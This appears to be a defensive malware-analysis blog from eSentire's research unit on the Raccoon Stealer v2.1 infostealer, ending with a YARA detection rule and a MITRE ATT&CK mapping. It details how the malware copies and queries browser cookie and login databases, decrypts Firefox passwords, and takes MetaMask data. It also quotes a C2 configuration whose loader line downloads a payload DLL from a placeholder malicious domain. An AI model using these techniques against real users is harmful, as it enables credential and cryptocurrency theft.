Combine cutting-edge XDR technology, multi-signal threat intelligence and 24/7 Elite Threat Hunters to help you build a world-class security operation.
Our team delivers the fastest response time in the industry. Threat suppression within just 4 hours of being engaged.
Cyber risk and advisory programs that identify security gaps and build security strategies to address them.
24/7 SOC-as-a-Service with unlimited threat hunting and incident handling.
XDR with machine learning that eliminates noise, enables real-time detection and response, and automatically blocks threats.
Seamless integration and threat investigation across your existing tech stack.
Proactive threat intelligence, original threat research and a world-class team of seasoned industry veterans.
Extend your team capabilities and prevent business disruption with expertise from eSentire.
We balance automated blocks with rapid human-led investigations to manage threats.
Guard endpoints by isolating and remediating threats to prevent lateral spread.
Defend brute force attacks, active intrusions and unauthorized scans.
Investigation and threat detection across multi-cloud or hybrid environments.
Remediate misconfigurations, vulnerabilities and policy violations.
Investigate and respond to compromised identities and insider threats.
Stop ransomware before it spreads.
Meet regulatory compliance mandates.
Detect and respond to zero-day exploits.
End misconfigurations and policy violations.
Defend third-party and supply chain risk.
Prevent disruption by outsourcing MDR.
Adopt a risk-based security approach.
Meet insurability requirements with MDR.
Protect your most sensitive data.
Build a proven security program.
Operationalize timely, accurate, and actionable cyber threat intelligence.
THE THREAT On October 23rd, Fortinet disclosed an actively exploited critical zero-day vulnerability impacting multiple versions for FortiManager. The vulnerability, tracked…
Oct 09, 2024THE THREAT Beginning in early September 2024, eSentire observed an increase in the number of incidents involving Lumma Stealer malware; this activity has remained common leading into…
eSentire is The Authority in Managed Detection and Response Services, protecting the critical data and applications of 2000+ organizations in 80+ countries from known and unknown cyber threats. Founded in 2001, the company’s mission is to hunt, investigate and stop cyber threats before they become business disrupting events.
We provide sophisticated cybersecurity solutions for Managed Security Service Providers (MSSPs), Managed Service Providers (MSPs), and Value-Added Resellers (VARs). Find out why you should partner with eSentire, the Authority in Managed Detection and Response, today.
Multi-Signal MDR with 300+ technology integrations to support your existing investments.
24/7 SOC-as-a-Service with unlimited threat hunting and incident handling.
Three MDR package tiers are available based on per-user pricing and level of risk tolerance.
The latest security advisories, blogs, reports, industry publications and webinars published by TRU.
Compare eSentire to other Managed Detection and Response vendors to see how we stack up against the competition.
See why 2000+ organizations globally have chosen eSentire for their MDR Solution.
In August 2022, the eSentire Threat Response Unit (TRU) team released a blog providing a brief overview of the new Raccoon Stealer version 2. In the previous blog, we mentioned the loss of the lead developer for the stealer; he was also believed to be responsible for critical operations within the stealer’s functionality. In 2023, TRU has continued to observe Raccoon Stealer v2 incidents, specifically targeting manufacturing and software industries.
This malware analysis delves deeper into the technical details of how the Raccoon Stealer malware operates and our security recommendations to protect your organization from being exploited.
On November 2021, Mark Sokolovsky, a Ukrainian national, was charged in an International Cybercrime Operation related to Raccoon Infostealer operations. According to the U.S. Department of Justice (DOJ), Mark used pseudonyms such as raccoonstealer, Photix, and black21jack77777 on forums.
According to KrebsOnSecurity, the leading developer of the stealer made a mistake by linking his Gmail account, under the nickname 'Photix' on a cybercrime forum, to an iCloud account, thereby exposing his real identity. United States Department of Justice launched a website where users can check whether their emails have been stolen by the stealer.
On March 25th, 2022, Raccoon Stealer stopped its operations, aligning with the timeline of Mark’s arrest. However, during the period of absence, Raccoon Stealer continued to undergo active development. On June 1, 2022, Raccoon Stealer resumed its operations and released the beta version of Raccoon Stealer 2.0. Currently, Raccoon Stealer remains active, with more members added to their support team.
In 2023, eSentire’s Threat Response Unit (TRU) has continued to observe Raccoon Stealer v2 incidents, specifically targeting manufacturing and software industries.
On February the 2nd, 2023, Raccoon Stealer officially exited Beta testing and announced the release of Raccoon Stealer v.2.1 (Figure 1).
The updated version includes features such as Signal Messenger data collection, cleaning from Defender detection (likely changing the code, obfuscation to avoid detections), and auto brute-forcing for cryptowallets (Figure 2).
Compared to the previous version, the panel is slightly updated. Now the configuration includes the ability to enable Discord and Signal data staging (Figure 3).
The builder can be generated as an exe or DLL. The DLL runs with an ordinal #1 or “_Start@16”. The original name you can find in the Raccoon Stealer v2.1 DLL binary is “Raccoon-2.dll” (Figure 4).
We were able to retrieve 62 samples containing DLL payloads on VirusTotal. The signers being used on the DLL payloads were:
For this blog, we analyzed Raccoon Stealer build (2.1.0-4.exe), MD5: 59b3f1bab2aee7c6ded44ab444c93d6b. Unlike other stealers such as Aurora Stealer, Raccoon Stealer is only capable of generating 32-bit builds.
The latest build of Raccoon Stealer uses the XOR encryption algorithm instead of RC4 (Figure 5).
Each string is encrypted with a different XOR key. The XOR function loops through each byte in the data list and XORs it with the corresponding byte in the key list. If the data is shorter than the key, it will wrap around to the beginning of the data and continue XORing with bytes from there (Figure 6).
The latest versions of Racoon Stealer use API hammering technique to evade detections and hinder the analysis by researchers. In the API hammering technique, the stealer repeatedly calls a single API function (e.g., PathIsSlowW, RealDriveType) in a tight loop, causing a high volume of calls to that function. This can cause the behavior of the malware to be overlooked or obscured by legitimate API calls, making it more difficult to detect the malicious code, which can be blended in within the API loop. We can use this script written by a Security Researcher at RecordedFuture to erase the API calls whose counts exceeds 400.
The function shown below (Figure 10) is responsible for loading functions using GetProcAddress from a DLL library at runtime.
The stealer looks for the presence of the mutex “AYAYAYAY1337,” and if the string is found, the stealer exits; this is done to ensure that only one instance of the stealer is running on the system. The mutex string correlates with the user-agent string found within the traffic capture (Figure 11).
The stealer checks if the current process is running under Local System privileges (Figure 12). The SID can be retrieved from the GetTokenInformation function, specifically the TOKEN_USER structure (TokenUser). The binary then compares the retrieved SID with SID S-1-5-18 (SYSTEM account).
The TOKEN_USER structure:
typedef struct _TOKEN_USER { SID_AND_ATTRIBUTES User; } TOKEN_USER, *PTOKEN_USER;
If the current running process has local system privileges, the stealer searches for a process with the name explorer.exe, obtains its access token, duplicates it, and then uses that token to create a new process with the same access rights as the original process (Local System privileges), this is possibly implemented for privilege elevation purposes (Figure 13).
The MachineGuid is obtained from the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography, the GUID is then added to the “System Info” text file as a part of the User ID in the exfiltrated logs (Figure 14).
As an example of parsing the browsing data, the stealer retrieves information about the cookies stored in cookies.sqlite database file in Firefox, including:
The function below is responsible for getting the path of the formhistory.sqlite file within Firefox, then it attempts to copy the file into AppData/LocalLow folder under a randomly generated name (Figure 15 & Figure 16). The function that randomly generates the filename is using the SystemFunction036 function, taking 12 characters as the size for the name. If it fails to copy or read the file – it deletes it.
The SQL database is accessed via the sqlite3_open16 function provided by the SQLite library. Then the sqlite3_prepare_v2 is called out to prepare an SQL statement to be executed by SQLite, which in our case is “SELECT host, path, isSecure, expiry, name, value FROM moz_cookies”.
The SQL query is used to retrieve data from the “moz_cookies” table in Firefox’s cookies database. This query selects the columns “host”, “path”, “isSecure”, “expiry”, “name”, and “value” for all rows in the table. This data includes information about website domains, the paths of web pages, whether the cookie is secure or not, the expiration time of the cookie, and the cookie name and value.
The stealer performs similar operation with extracting the encrypted credentials from the perspective of copying the logins.json file into the AppData/LocalLow folder.
encryptedUsername, encryptedPassword, guid, httpRealm, and hostname are the values in the logins.json file that the stealer is looking for, shown below in Figure 17.
If the file can be copied, the stealer reads the content of the copied file and attempts to decrypt the encrypted passwords using the functions from the Mozilla NSS library.
In short, this is how the password and username decryption work based on the decompiled code: the binary obtains the internal key slot using the PK11_GetInternalKeySlot function. This function is used to obtain a handle to the internal key slot. The key slot is used to store cryptographic keys that are used to encrypt and decrypt data.
The PK11_Authenticate function is then called to authenticate the key slot. This function is used to verify that the application is authorized to use the key stored in the slot. PK11SDR_Decrypt is used to decrypt data using the key stored in the key slot. The function takes as input the encrypted data, a pointer to the decrypted data buffer, the length of the decrypted data buffer, and the encryption algorithm and mode to use for decryption (Figure 18).
After successfully decrypting the encrypted data, the username and password are parsed in the format:
URL: <URL> USR: <Username> PASS: <Password>
The same operation is done with the browsing history – the file is copied into AppData/LocalLow. The history is extracted via the “SELECT fieldname, value FROM moz_formhistory” SQL query (Figure 20).
The function below retrieves autofill data via the SQL query “SELECT name, value FROM autofill” (Figure 21).
The snippet below copies the prefs.js to an AppData\LocalLow folder and looks for the MetaMask browser extension reference within the copied prefs.js file (a preference file that also includes settings and preferences for any add-ons or extensions installed in the browser). It then accesses the storage\default path to extract the MetaMask data within the IDB folder (Figures 22 - 23).
The stealer gets the list of the installed applications by accessing the registry key "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall", specifically the DisplayName key (Figure 24).
The stealer also retrieves the number of processors on the infected machine and writes it to a “System Info” file using the format “- CPU: %s (%d cores)”, where %s represents the processor name and %d is the number of cores (Figure 26).
The information on the version of the Windows operating system is obtained by accessing the registry key "SOFTWARE\Microsoft\Windows NT\CurrentVersion", specifically the key “ProductName”. The result is written to the “System Info” file under “OS: “, shown in Figure 27 below.
This code below checks if the operating system is 64-bit or 32-bit and adds the result to a string “Architecture: “. It sets v1 to 1 if the OS is 64-bit, which means that the binary was able to retrieve the path of the system directory used by WOW64 (the directory is not present on 32-bit systems), and 0 otherwise (Figure 28).
The time zone information is retrieved via the API GetTimeZoneInformation. The system locale is obtained via GetLocaleInfoW and GetUserDefaultLCID functions, system's RAM (Random Access Memory) is obtained via the GlobalMemoryStatusEx function.
In the previous blog, we described how Raccoon Stealer transmits data to the C2 channel.
The stealer configuration can be observed in the traffic capture (Figure 29).
scrnsht_Screenshot.jpeg:1 (Screenshot capture enabled)
tlgrm_Telegram:Telegram Desktop\tdata|*|*emoji*,*user_data*,*tdummy*,*dumps* (Telegram data)
sgnl_Signal:Signal|*|stickers.*,*cache*,*Cache*,*.exe (Signal Messenger data)
dscrd_Discord:discord\Local Storage\leveldb|*.log,*.ldb|- (Discord data)
grbr_Desktop:%USERPROFILE%\Desktop\|*.txt|*windows*, *recycle|100|1|1|files (Configuration of the Grabber module where 100 is the maximum file size in KB to grab, 1 – recursive search enabled, 1 – shortcuts enabled)
ldr_2: https://<malicious.domain> /payload.dll|%APPDATA%|dll (Example of the Loader module configuration including the folder where the secondary file is dropped and the extension of the file)
As we can see, apart from the Signal data exfiltration, API hammering, and XOR encryption, there are no significant updates in the newest build. However, the stealer is still under active development and support.
We wrote the C2 and the mutex extractor for the latest Raccoon Stealer build and the IDAPython script to decrypt the encrypted strings.
We recommend implementing the following controls to help secure your organization against Raccoon Stealer malware:
While the TTPs used by threat actor(s) grow in sophistication, they lead to a certain level of difficulties at which critical business decisions must be made. Preventing the various attack technique and tactics utilized by the modern threat actor requires actively monitoring the threat landscape, developing and deploying endpoint detections, and the ability to investigate logs & network data during active intrusions.
eSentire TRU is a world-class team of threat researchers who develop new detections enriched by original threat intelligence and leverage new machine learning models that correlate multi-signal data and automate rapid response to advanced threats.
If you are not currently engaged with an MDR provider, eSentire MDR can help you reclaim the advantage and put your business ahead of disruption. Learn what it means to have an elite team of Threat Hunters and Researchers that works for you. Connect with an eSentire Security Specialist.
rule RaccoonStealerv2 { meta: author = "eSentire Threat Intelligence team" date = "04/17/2023" description = "Detects the latest unpacked/unobfuscated build 2.1.0-4" strings: $pattern1 = {B9 ?? ?? ?? 00 E8 ?? ?? ?? 00 ?? ?? 89 45 E8} $pattern2 = {68 ?? ?? ?? 00 ?? 68 01 00 1F 00} $pattern3 = {68 ?? ?? ?? 00 ?? ?? 68 01 00 1F 00 FF 15 64 ?? ?? 00} $m1 = {68 ?? ?? ?? 00 ?? 00 68 01 00 1f 00 ff 15 64 ?? ?? 00} $m2 = {68 ?? ?? ?? 00 ?? 68 01 00 1f 00 ff 15 64 ?? ?? 00} condition: 2 of ($pattern*) and uint16(0) == 0x5A4D and 1 of ($m*) and uint32(uint32(0x3C)) == 0x00004550 and filesize < 200KB }
MITRE ATT&CK Tactic |
ID |
MITRE ATT&CK Technique |
Description |
MITRE ATT&CK TacticInitial Access |
IDT1189 |
MITRE ATT&CK TechniqueDrive-By Compromise |
DescriptionRaccoon Stealer is delivered via malicious websites hosting fake cracked or pirated software e |
MITRE ATT&CK TacticUser Execution |
IDT1204.002 |
MITRE ATT&CK TechniqueMalicious File |
DescriptionThe user launches the malicious file |
MITRE ATT&CK TacticCredential Access |
IDT1555 |
MITRE ATT&CK TechniqueCredentials from Password Stores |
DescriptionRaccoon Stealer steals sensitive data from browsers including credentials, cookies, and saved credit cards. |
MITRE ATT&CK TacticDiscovery |
IDT1033 |
MITRE ATT&CK TechniqueSystem Owner/User Discovery |
DescriptionThe stealer enumerates the host for the username and hardware information, running processes and installed applications as well as keyboard and display languages |
MITRE ATT&CK TacticCollection |
IDT1113 |
MITRE ATT&CK TechniqueScreen Capture |
DescriptionIf the option is enabled, the stealer takes the screenshot from the infected machine and sends it to the C2 |
MITRE ATT&CK TacticExfiltration |
IDT1020 |
MITRE ATT&CK TechniqueAutomated Exfiltration |
DescriptionThe stealer automatically exfiltrates the gathered files to C2, some file-grabbing options can be customized by an attacker |
MITRE ATT&CK TacticAccess Token Manipulation |
IDT1134 |
MITRE ATT&CK TechniqueCreate Process with Token |
DescriptionRaccoon Stealer is capable of creating a new process with elevated privileges |
The eSentire Threat Response Unit (TRU) is an industry-leading threat research team committed to helping your organization become more resilient. TRU is an elite team of threat hunters and researchers that supports our 24/7 Security Operations Centers (SOCs), builds threat detection models across the eSentire XDR Cloud Platform, and works as an extension of your security team to continuously improve our Managed Detection and Response service. By providing complete visibility across your attack surface and performing global threat sweeps and proactive hypothesis-driven threat hunts augmented by original threat research, we are laser-focused on defending your organization against known and unknown threats.